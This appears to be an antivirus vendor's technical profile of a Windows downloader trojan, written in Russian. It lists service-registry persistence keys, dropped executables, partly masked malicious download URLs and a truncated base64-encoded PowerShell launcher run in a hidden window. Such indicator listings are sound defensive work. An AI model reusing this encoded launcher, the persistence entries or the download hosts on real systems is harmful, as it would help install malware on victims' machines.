Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\NlsData003e] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\NlsData003e] 'ImagePath' = '"%WINDIR%\SysWOW64\reg\NlsData003e.exe"'
- 'NlsData003e' "%WINDIR%\SysWOW64\reg\NlsData003e.exe"
- 'NlsData003e' %WINDIR%\SysWOW64\reg\NlsData003e.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVADQAawB2AGYAYQBtAD0AKAAnAEYAbgAnACsAKAAnAGYAMwA0ACcAKwAnAHYAJwApACsAJwBiACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVABlAE0AUABcAFcATwByAGQAXAAyADAAMQA5AF...
- %TEMP%\word\2019\k073c59.exe
- %WINDIR%\syswow64\reg\nlsdata003e.exe
- %TEMP%\word\2019\k073c59.exe в %WINDIR%\syswow64\reg\nlsdata003e.exe
- '24.#6.151.3':80
- http://www.no###hem.com.tr/wp-includes/file/HDSTwTon/
- http://24.#6.151.3/ruHRrauL4zLaG8n/nrGke/W3BK0EgijL/uwOrwQOuz/EZfrKiZnkCZA0/Nkdcta0VV0/
- DNS ASK no###hem.com.tr
- '%TEMP%\word\2019\k073c59.exe'
- '%WINDIR%\syswow64\reg\nlsdata003e.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVADQAawB2AGYAYQBtAD0AKAAnAEYAbgAnACsAKAAnAGYAMwA0ACcAKwAnAHYAJwApACsAJwBiACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVABlAE0AUABcAFcATwByAGQAXAAyADAAMQA5AF...' (со скрытым окном)